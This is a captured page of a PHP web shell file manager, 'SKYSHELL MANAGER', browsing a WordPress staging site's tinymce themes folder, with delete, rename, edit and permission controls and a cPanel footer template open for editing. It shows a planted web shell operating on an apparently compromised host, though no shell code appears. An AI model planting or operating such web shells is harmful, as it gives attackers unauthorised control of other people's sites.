📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: footer.tmpl
[% USE Whostmgr; USE VarCache; # NOTE: Analytics UI includes are disabled by default and are strictly opt-in only. IF is_user_analytics_required_by_leika AND template_exists('/var/cpanel/customizations/whm/includes/cp_analytics_whm.html.tt'); # The package updates setting check is required to avoid regressions during cPanel&WHM upgrade to v112. # This regression may occur only for users who have package updates disabled. (Details available in PH-19613) IF varcache.is_package_update_enabled; TRY; '<div id="cp-analytics-whm">'; INCLUDE '/var/cpanel/customizations/whm/includes/cp_analytics_whm.html.tt'; '</div>'; CATCH; ""; END; ELSIF CPANEL.is_server_analytics_enabled(); TRY; '<div id="cp-analytics-whm">'; INCLUDE '/var/cpanel/customizations/whm/includes/cp_analytics_whm.html.tt'; '</div>'; CATCH; ""; END; END; END; %] </body> </html>
Save